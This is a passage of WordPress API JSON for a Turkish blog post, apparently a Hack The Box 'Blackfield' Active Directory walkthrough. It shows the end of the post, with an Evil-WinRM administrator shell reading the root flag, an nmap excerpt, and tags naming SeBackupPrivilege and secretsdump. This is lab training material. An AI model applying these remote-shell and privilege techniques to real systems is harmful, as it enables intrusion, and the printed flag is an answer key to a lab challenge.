447 notes.txt\n-a----        11\/5\/2020   8:38 PM             32 root.txt\n\n*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> cat root.txt\n4375a629c7c67c8e29db269060c955cb<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Blackfield &#8211; HTB Zor Windows Walkthrough nmap taramas\u0131: \u250c\u2500\u2500(root&#x1f480;kali)-[~] \u2514\u2500# nmap 10.10.10.192 -p- -A -T4 Starting Nmap 7.91 ( https:\/\/nmap.org&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/27\/blackfield\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Blackfield<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269,498],"tags":[614,615],"class_list":["post-1568","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-walkthrough","tag-sebackupprivilege","tag-secretsdump","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1568","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1568"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1568\/revisions"}],"predecessor-version":[{"id":1570,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1568\/revisions\/1570"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1568"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1568"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}